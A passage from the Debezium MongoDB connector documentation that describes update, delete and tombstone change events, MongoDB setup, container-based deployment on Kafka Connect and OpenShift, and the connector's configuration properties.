{prodname} connector's are not able to keep this state.\n====\n\n==== Change streams capture mode\nThe value of a change event for an update in the sample `customers` collection has the same schema as a _create_ event for that collection. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. An _update_ event does have an `after` value only if the `capture.mode` option is set to `change_streams_update_full`. There is a new structured field `updateDescription` with a few additional fields in this case:\n\n* `updatedFields` is a string field that contains the JSON representation of the updated document fields with their values\n\n* `removedFields` is a list of field names that were removed from the document\n\n* `truncatedArrays` is a list of arrays in the document that were truncated\n\nHere is an example of a change event value in an event that the connector generates for an update in the `customers` collection:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"u\", \/\/ <1>\n \"ts_ms\": 1465491461815, \/\/ <2>\n \"after\":\"{\\\"_id\\\": {\\\"$numberLong\\\": \\\"1004\\\"},\\\"first_name\\\": \\\"Anne Marie\\\",\\\"last_name\\\": \\\"Kretchmar\\\",\\\"email\\\": \\\"annek@noanswer.org\\\"}\", \/\/ <3>\n \"updateDescription\": {\n \"removedFields\": null,\n \"updatedFields\": \"{\\\"first_name\\\": \\\"Anne Marie\\\"}\", \/\/ <4>\n \"truncatedArrays\": null\n },\n \"source\": { \/\/ <5>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 1,\n \"h\": null,\n \"tord\": null,\n \"stxnid\": null,\n \"lsid\":\"{\\\"id\\\": {\\\"$binary\\\": \\\"FA7YEzXgQXSX9OxmzllH2w==\\\",\\\"$type\\\": \\\"04\\\"},\\\"uid\\\": {\\\"$binary\\\": \\\"47DEQpj8HBSa+\/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=\\\",\\\"$type\\\": \\\"00\\\"}}\",\n \"txnNumber\":1\n }\n }\n }\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `u` indicates that the operation updated a document.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`after`\n|Contains the JSON string representation of the actual MongoDB document.\n +\nAn _update_ event value does not contain an `after` field if the capture mode is not set to `change_streams_update_full`\n\n|4\n|`updatedFields`\n|Contains the JSON string representation of the updated field values of the document. In this example, the update changed the `first_name` field to a new value.\n\n|5\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the updated document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction.\n\n|===\n\n[WARNING]\n====\nThe `after` value in the event should be handled as the at-point-of-time value of the document.\nThe value is not calculated dynamically but is obtained from the collection.\nIt is thus possible if multiple updates are closely following one after the other, that all _update_ updates events will contain the same `after` value which will be representing the last value stored in the document.\n\nIf your application depends on gradual change evolution then you should rely on `updateDescription` only.\n====\n\n[id=\"mongodb-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same collection. The `payload` portion in a _delete_ event contains values that are different from _create_ and _update_ events for the same collection. In particular, a _delete_ event contains neither an `after` value nor a `patch` or `updateDescription` values. Here is an example of a _delete_ event for a document in the `customers` collection:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"d\", \/\/ <1>\n \"ts_ms\": 1465495462115, \/\/ <2>\n \"filter\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"}}\", \/\/ <3>\n \"source\": { \/\/ <4>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": true,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 6,\n \"h\": 1546547425148721999\n }\n }\n }\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this document was deleted.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`filter`\n|Contains the JSON string representation of the MongoDB selection criteria that was used to identify the document to be deleted (oplog capture mode only).\n\n|4\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ or _update_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contained the deleted document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event (oplog capture mode only).\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction (change streams capture mode only).\n\n|===\n\nMongoDB connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[id=\"mongodb-tombstone-events\"]\n=== Tombstone events\nAll MongoDB connector events for a uniquely identified document have exactly the same key. When a document is deleted, the _delete_ event value still works with log compaction because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that key, the message value must be `null`. To make this possible, after {prodname}\u2019s MongoDB connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value. A tombstone event informs Kafka that all messages with that same key can be removed.\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-mongodb-to-work-with-debezium\n\/\/ Title: Setting up MongoDB to work with a {prodname} connector\n[[setting-up-mongodb]]\n== Setting up MongoDB\n\nThe MongoDB connector uses MongoDB's oplog\/change streams to capture the changes, so the connector works only with MongoDB replica sets or with sharded clusters where each shard is a separate replica set.\nSee the MongoDB documentation for setting up a https:\/\/docs.mongodb.com\/manual\/replication\/[replica set] or https:\/\/docs.mongodb.com\/manual\/sharding\/[sharded cluster].\nAlso, be sure to understand how to enable https:\/\/docs.mongodb.com\/manual\/tutorial\/deploy-replica-set-with-keyfile-access-control\/#deploy-repl-set-with-auth[access control and authentication] with replica sets.\n\nYou must also have a MongoDB user that has the appropriate roles to read the `admin` database where the oplog can be read. Additionally, the user must also be able to read the `config` database in the configuration server of a sharded cluster and must have `listDatabases` privilege action.\nWhen change streams are used (the default) the user also must have cluster-wide privilege actions `find` and `changeStream`.\n\nifdef::community[]\n[[mongodb-in-the-cloud]]\n=== MongoDB in the Cloud\n\nYou can use the {prodname} connector for MongoDB with https:\/\/www.mongodb.com\/atlas\/database[MongoDB Atlas].\nWhen connecting {prodname} to MongoDB Atlas, enable one of the xref:mongodb-property-capture-mode[`capture modes`] to be based on change streams, rather than oplog.\nNote that MongoDB Atlas only supports secure connections via SSL, i.e. the xref:mongodb-property-mongodb-ssl-enabled[`+mongodb.ssl.enabled`] connector option _must_ be set to `true`.\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-mongodb-connectors\n\/\/ Title: Deployment of {prodname} MongoDB connectors\n[[mongodb-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\nTo deploy a {prodname} MongoDB connector, you install the {prodname} MongoDB connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.\n\n.Prerequisites\n* link:https:\/\/zookeeper.apache.org\/[Apache Zookeeper], link:http:\/\/kafka.apache.org\/[Apache Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* MongoDB is installed and is xref:{link-mongodb-connector}#setting-up-mongodb[set up to work with the {prodname} connector].\n\n.Procedure\n. Download the\nifeval::['{page-version}' == 'master']\n{link-mongodb-plugin-snapshot}[connector's plug-in archive],\nendif::[]\nifeval::['{page-version}' != 'master']\nhttps:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mongodb\/{debezium-version}\/debezium-connector-mongodb-{debezium-version}-plugin.tar.gz[connector's plug-in archive],\nendif::[]\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Apache Zookeeper, Apache Kafka, and Kafka Connect with the MongoDB connector already installed and ready to run.\n\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\n\nThe {prodname} xref:tutorial.adoc[tutorial] walks you through using these images, and this is a great way to learn about {prodname}.\nendif::community[]\n\nifdef::product[]\nYou can use either of the following methods to deploy a {prodname} MongoDB connector:\n\n* xref:openshift-streams-mongodb-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].\n+\nThis is the preferred method.\n* xref:deploying-debezium-mongodb-connectors[Build a custom Kafka Connect container image from a Dockerfile].\n\n.Additional resources\n\n* xref:mongodb-connector-properties[]\n\n\/\/ Type: concept\n[id=\"openshift-streams-mongodb-connector-deployment\"]\n=== MongoDB connector deployment using {StreamsName}\n\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-streams-deployment.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"using-streams-to-deploy-debezium-mongodb-connectors\"]\n=== Using {StreamsName} to deploy a {prodname} MongoDB connector\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"deploying-debezium-mongodb-connectors\"]\n=== Deploying a {prodname} MongoDB connector by building a custom Kafka Connect container image from a Dockerfile\n\nTo deploy a {prodname} MongoDB connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive and then push this container image to a container registry.\nYou then create two custom resources (CRs):\n\n* A `KafkaConnect` CR that defines your Kafka Connect instance.\n The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.\n You apply this CR to the OpenShift instance where link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.\n {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.\n\n* A `KafkaConnector` CR that defines your {prodname} MongoDB connector.\n Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.\n\n.Prerequisites\n\n* MongoDB is running and you completed the steps to {LinkDebeziumUserGuide}#setting-up-mongodb[set up MongoDB to work with a {prodname} connector].\n\n* {StreamsName} is deployed on OpenShift and is running Apache Kafka and Kafka Connect.\n For more information, see link:{LinkDeployStreamsOpenShift}[{NameDeployStreamsOpenShift}].\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.\n\n.Procedure\n\n. Create the {prodname} MongoDB container for Kafka Connect:\n\n.. Create a Dockerfile that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following command:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-mongodb.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nRUN mkdir -p \/opt\/kafka\/plugins\/debezium \/\/ <2>\nRUN curl -O {red-hat-maven-repository}debezium\/debezium-connector-{connector-file}\/{debezium-version}-redhat-__<build_number>__\/debezium-connector-{connector-file}-{debezium-version}-redhat-__<build_number>__-plugin.zip\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Specifies the path to your Kafka Connect plug-ins directory. If your Kafka Connect plug-ins directory is in a different location, replace this path with the actual path of your directory.\n+\nThe command creates a Dockerfile with the name `debezium-container-for-mongodb.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-mongodb.yaml` Docker file that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter one of the following commands:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-mongodb:latest .\n----\n+\n[source,shell,options=\"nowrap\"]\n----\ndocker build -t debezium-container-for-mongodb:latest .\n----\nThe preceding commands build a container image with the name `debezium-container-for-mongodb`.\n\n.. Push your custom image to a container registry, such as `quay.io` or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-mongodb:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-mongodb:latest\n----\n\n.. Create a new {prodname} MongoDB `KafkaConnect` custom resource (CR).\nFor example, create a `KafkaConnect` CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n #...\n image: debezium-container-for-mongodb \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that `KafkaConnector` resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your Debezium connector.\nThis property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.\n\n.. Apply the `KafkaConnect` CR to the OpenShift Kafka Connect environment by entering the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThe command adds a Kafka Connect instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. Create a `KafkaConnector` custom resource that configures your {prodname} MongoDB connector instance.\n+\nYou configure a {prodname} MongoDB connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce change events for a subset of MongoDB replica sets or sharded clusters.\nOptionally, you can set properties that filter out collections that are not needed.\n+\nThe following example configures a {prodname} connector that connects to a MongoDB replica set `rs0` at port `27017` on `192.168.99.100`,\nand captures changes that occur in the `inventory` collection.\n`fullfillment` is the logical name of the replica set.\n+\n.MongoDB `inventory-connector.yaml`\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels: strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.mongodb.MongoDbConnector \/\/ <2>\n config:\n mongodb.hosts: rs0\/192.168.99.100:27017 \/\/ <3>\n mongodb.name: fulfillment \/\/ <4>\n collection.include.list: inventory[.]* \/\/ <5>\n----\n<1> The name that is used to register the connector with Kafka Connect.\n<2> The name of the MongoDB connector class.\n<3> The host addresses to use to connect to the MongoDB replica set.\n<4> The _logical name_ of the MongoDB replica set, which forms a namespace for generated events and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<5> An optional list of regular expressions that match the collection namespaces (for example, <dbName>.<collectionName>) of all collections to be monitored.\n\n. Create your connector instance with Kafka Connect.\nFor example, if you saved your `KafkaConnector` resource in the `inventory-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f inventory-connector.yaml\n----\n+\nThe preceding command registers `inventory-connector` and the connector starts to run against the `inventory` collection as defined in the `KafkaConnector` CR.\nendif::product[]\n\nifdef::community[]\n[[mongodb-example-configuration]]\n=== MongoDB connector configuration example\n\nFollowing is an example of the configuration for a connector instance that captures data from a MongoDB replica set `rs0` at port 27017 on 192.168.99.100, which we logically name `fullfillment`.\nTypically, you configure the {prodname} MongoDB connector in a JSON file by setting the configuration properties that are available for the connector.\n\nYou can choose to produce events for a particular MongoDB replica set or sharded cluster.\nOptionally, you can filter out collections that are not needed.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mongodb.MongoDbConnector\", \/\/ <2>\n \"mongodb.hosts\": \"rs0\/192.168.99.100:27017\", \/\/ <3>\n \"mongodb.name\": \"fullfillment\", \/\/ <4>\n \"collection.include.list\": \"inventory[.]*\" \/\/ <5>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of the MongoDB connector class.\n<3> The host addresses to use to connect to the MongoDB replica set.\n<4> The _logical name_ of the MongoDB replica set, which forms a namespace for generated events and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<5> A list of regular expressions that match the collection namespaces (for example, <dbName>.<collectionName>) of all collections to be monitored. This is optional.\n\nendif::community[]\n\nFor the complete list of the configuration properties that you can set for the {prodname} MongoDB connector,\nsee xref:{link-mongodb-connector}#mongodb-connector-properties[MongoDB connector configuration properties].\n\nifdef::community[]\nYou can send this configuration with a `POST` command to a running Kafka Connect service.\nThe service records the configuration and starts one connector task that performs the following actions:\n\n* Connects to the MongoDB replica set or sharded cluster.\n* Assigns tasks for each replica set.\n* Performs a snapshot, if necessary.\n* Reads the oplog\/change stream.\n* Streams change event records to Kafka topics.\n\n[[mongodb-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a {prodname} MongoDB connector, create a connector configuration, and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* xref:{link-mongodb-connector}#setting-up-mongodb[MongoDB is set up to work with a {prodname} connector].\n* The {prodname} MongoDB connector is installed.\n\n.Procedure\n\n. Create a configuration for the MongoDB connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\nendif::community[]\n\n.Results\nAfter the connector starts, it completes the following actions:\n\n* xref:{link-mongodb-connector}#mongodb-performing-a-snapshot[Performs a consistent snapshot] of the collections in your MongoDB replica sets.\n* Reads the oplogs\/change streams for the replica sets.\n* Produces change events for every inserted, updated, and deleted document.\n* Streams change event records to Kafka topics.\n\nifdef::product[]\n\/\/ Type: procedure\n[id=\"verifying-that-the-debezium-mongodb-connector-is-running\"]\n=== Verifying that the {prodname} MongoDB connector is running\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-verifying-the-connector-deployment.adoc[leveloffset=+1]\nendif::product[]\n\n\/\/ Type: reference\n\/\/ Title: Description of {prodname} MongoDB connector configuration properties\n[[mongodb-connector-properties]]\n=== Connector properties\n\nThe {prodname} MongoDB connector has numerous configuration properties that you can use to achieve the right connector behavior for your application.\nMany properties have default values. Information about the properties is organized as follows:\n\n* xref:debezium-mongodb-connector-required-configuration-properties[Required {prodname} MongoDB connector configuration properties]\n* xref:debezium-mongodb-connector-advanced-configuration-properties[Advanced {prodname} MongoDB connector configuration properties]\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[id=\"debezium-mongodb-connector-required-configuration-properties\"]\n.Required {prodname} MongoDB connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[mongodb-property-name]]<<mongodb-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|[[mongodb-property-connector-class]]<<mongodb-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.mongodb.MongoDbConnector` for the MongoDB connector.\n\n|[[mongodb-property-mongodb-hosts]]<<mongodb-property-mongodb-hosts, `+mongodb.hosts+`>>\n|\n|The comma-separated list of hostname and port pairs (in the form 'host' or 'host:port') of the MongoDB servers in the replica set. The list can contain a single hostname and port pair. If `mongodb.members.auto.discover` is set to `false`, then the host and port pair should be prefixed with the replica set name (e.g., `rs0\/localhost:27017`). +\n +\n[NOTE]\n====\nIt is mandatory to provide the current primary address.\nThis limitation will be removed in the next {prodname} release.\n====\n\n|[[mongodb-property-mongodb-name]]<<mongodb-property-mongodb-name, `+mongodb.name+`>>\n|\n|A unique name that identifies the connector and\/or MongoDB replica set or sharded cluster that this connector monitors.\nEach server should be monitored by at most one {prodname} connector, since this server name prefixes all persisted Kafka topics emanating from the MongoDB replica set or cluster.\nUse only alphanumeric characters, hyphens, dots and underscores to form the name.\nThe logical name should be unique across all other connectors, because the name is used as the prefix in naming the Kafka topics that receive records from this connector. +\n +\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\n====\n\n|[[mongodb-property-mongodb-user]]<<mongodb-property-mongodb-user, `+mongodb.user+`>>\n|\n|Name of the database user to be used when connecting to MongoDB. This is required only when MongoDB is configured to use authentication.\n\n|[[mongodb-property-mongodb-password]]<<mongodb-property-mongodb-password, `+mongodb.password+`>>\n|\n|Password to be used when connecting to MongoDB. This is required only when MongoDB is configured to use authentication.\n\n|[[mongodb-property-mongodb-authsource]]<<mongodb-property-mongodb-authsource, `+mongodb.authsource+`>>\n|`admin`\n|Database (authentication source) containing MongoDB credentials. This is required only when MongoDB is configured to use authentication with another authentication database than `admin`.\n\n|[[mongodb-property-mongodb-ssl-enabled]]<<mongodb-property-mongodb-ssl-enabled, `+mongodb.ssl.enabled+`>>\n|`false`\n|Connector will use SSL to connect to MongoDB instances.\n\n|[[mongodb-property-mongodb-ssl-invalid-hostname-allowed]]<<mongodb-property-mongodb-ssl-invalid-hostname-allowed, `+mongodb.ssl.invalid.hostname.allowed+`>>\n|`false`\n|When SSL is enabled this setting controls whether strict hostname checking is disabled during connection phase. If `true` the connection will not prevent man-in-the-middle attacks.\n\n|[[mongodb-property-database-include-list]]<<mongodb-property-database-include-list, `+database.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be monitored; any database name not included in `database.include.list` is excluded from monitoring. By default all databases are monitored.\nMust not be used with `database.exclude.list`.\n\n|[[mongodb-property-database-exclude-list]]<<mongodb-property-database-exclude-list, `+database.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be excluded from monitoring; any database name not included in `database.exclude.list` is monitored.\nMust not be used with `database.include.list`.\n\n|[[mongodb-property-collection-include-list]]<<mongodb-property-collection-include-list, `+collection.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified namespaces for MongoDB collections to be monitored; any collection not included in `collection.include.list` is excluded from monitoring. Each identifier is of the form _databaseName_._collectionName_. By default the connector will monitor all collections except those in the `local` and `admin` databases.\nMust not be used with `collection.exclude.list`.\n\n|[[mongodb-property-collection-exclude-list]]<<mongodb-property-collection-exclude-list, `+collection.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified namespaces for MongoDB collections to be excluded from monitoring; any collection not included in `collection.exclude.list` is monitored. Each identifier is of the form _databaseName_._collectionName_.\nMust not be used with `collection.include.list`.\n\n|[[mongodb-property-snapshot-mode]]<<mongodb-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for running a snapshot upon startup of the connector. The default is *initial*, and specifies that the connector reads a snapshot when either no offset is found or if the oplog\/change stream no longer contains the previous offset. The *never* option specifies that the connector should never use snapshots, instead the connector should proceed to tail the log.\n\n|[[mongodb-property-capture-mode]]<<mongodb-property-capture-mode, `+capture.mode+`>>\n|`change_streams_update_full`\n|Specifies the method used to capture changes from the MongoDB server. The default is *change_streams_update_full*, and specifies that the connector captures changes via MongoDB Change Streams mechanism, and that _update_ events should contain the full document. The *change_streams* mode will use the same capturing method, but _update_ events won't contain the full document. +\nThe *oplog* mode specifies that the MongoDB oplog will be accessed directly; this is the legacy method and should not be used for new connector instances.\n\n|[[mongodb-property-snapshot-include-collection-list]]<<mongodb-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All collections specified in `collection.include.list`\n|An optional, comma-separated list of regular expressions that match names of schemas specified in `collection.include.list` for which you *want* to take the snapshot.\n\n|[[mongodb-property-field-exclude-list]]<<mongodb-property-field-exclude-list, `+field.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of the fully-qualified names of fields that should be excluded from change event message values. Fully-qualified names for fields are of the form _databaseName_._collectionName_._fieldName_._nestedFieldName_, where _databaseName_ and _collectionName_ may contain the wildcard (*) which matches any characters.\n\n|[[mongodb-property-field-renames]]<<mongodb-property-field-renames, `+field.renames+`>>\n|_empty string_\n|An optional comma-separated list of the fully-qualified replacements of fields that should be used to rename fields in change event message values. Fully-qualified replacements for fields are of the form _databaseName_._collectionName_._fieldName_._nestedFieldName_:__newNestedFieldName__, where _databaseName_ and _collectionName_ may contain the wildcard (*) which matches any characters, the colon character (:) is used to determine rename mapping of field. The next field replacement is applied to the result of the previous field replacement in the list, so keep this in mind when renaming multiple fields that are in the same path.\n\n|[[mongodb-property-tasks-max]]<<mongodb-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The MongoDB connector will attempt to use a separate task for each replica set, so the default is acceptable when using the connector with a single MongoDB replica set. When using the connector with a MongoDB sharded cluster, we recommend specifying a value that is equal to or more than the number of shards in the cluster, so that the work for each replica set can be distributed by Kafka Connect.\n\n|[[mongodb-property-snapshot-max-threads]]<<mongodb-property-snapshot-max-threads, `+snapshot.max.threads+`>>\n|`1`\n|Positive integer value that specifies the maximum number of threads used to perform an intial sync of the collections in a replica set. Defaults to 1.\n\n|[[mongodb-property-tombstones-on-delete]]<<mongodb-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[mongodb-property-snapshot-delay-ms]]<<mongodb-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before taking a snapshot after starting up; +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|[[mongodb-property-snapshot-fetch-size]]<<mongodb-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`0`\n|Specifies the maximum number of documents that should be read in one go from each collection while taking a snapshot.\nThe connector will read the collection contents in multiple batches of this size. +\nDefaults to 0, which indicates that the server chooses an appropriate fetch size.\n\n|[[mongodb-property-schema-name-adjustment-mode]]<<mongodb-property-schema-name-adjustment-mode,`+schema.name.adjustment.mode+`>>\n|avro\n|Specifies how schema names should be adjusted for compatibility with the message converter used by the connector. Possible settings: +\n\n* `avro` replaces the characters that cannot be used in the Avro type name with underscore. +\n* `none` does not apply any adjustment. +\n\n|===\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[id=\"debezium-mongodb-connector-advanced-configuration-properties\"]\n.{prodname} MongoDB connector advanced configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[mongodb-property-max-batch-size]]<<mongodb-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|[[mongodb-property-max-queue-size]]<<mongodb-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[mongodb-property-max-queue-size-in-bytes]]<<mongodb-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:mongodb-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[mongodb-property-poll-interval-ms]]<<mongodb-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. 